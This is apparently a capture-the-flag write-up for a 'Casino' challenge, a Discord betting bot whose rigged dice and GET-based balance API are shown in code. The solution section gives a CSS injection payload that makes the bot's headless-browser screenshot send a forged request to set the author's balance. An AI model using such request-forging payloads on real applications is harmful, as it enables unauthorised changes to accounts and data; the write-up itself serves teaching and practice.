# Casino

## Challenge files
Source code for a discord bot

## Analysis
The discord bot allowed users to bet virtual money. If we got 1000, we could have it dm us the flag. The scoreboard website could show badges for users to brag about how much money they had, and the bot could produce screenshots of the badges on request using puppeteer.

```js
  const yourDice = getRandomInt(1, 6 + 1)
  let myDice = getRandomInt(1, 6 + 1)

  // Avert your eyes
  if (balance + bet >= 1000) myDice = 6

  const lines = [`You rolled a ${yourDice} and I rolled a ${myDice}`]

  if (yourDice > myDice) {
    balance += bet
    await setBalance(user, balance)
    lines.push(`Congrats you won $${bet}`)
    lines.push(`You now have $${balance}`)
  } else if (yourDice < myDice) {
    balance -= bet
    await setBalance(user, balance)
    lines.push(`Haha idiot you just lost $${bet}`)
    lines.push(`You now have $${balance}`)
  } else {
    lines.push('Tie')
  }
```
Unfortunately for us, it was rigged so that we couldn't get 1000.

Some more interesting things were that the api that the bot used to set the balance internally used get requests:
```js
async function setBalance (user, balance) {
  return await fetch(
    `${apiUrl}/set_balance?${new URLSearchParams({
      user: user.tag,
      balance
    })}`
  )
}
```

and we could set custom css to be applied to the badge when the bot was taking the screenshot:
```js
    await page.goto(
      `${apiUrl}/badge?${new URLSearchParams({ user: user.tag, css })}`,
      { waitUntil: 'networkidle2' }
    )
```

## Solution
We can make get requests using css!

```css
#badge {
	background-image: url("/set_balance?user=danielp%23[redacted]&balance=1337") !important;
}
```
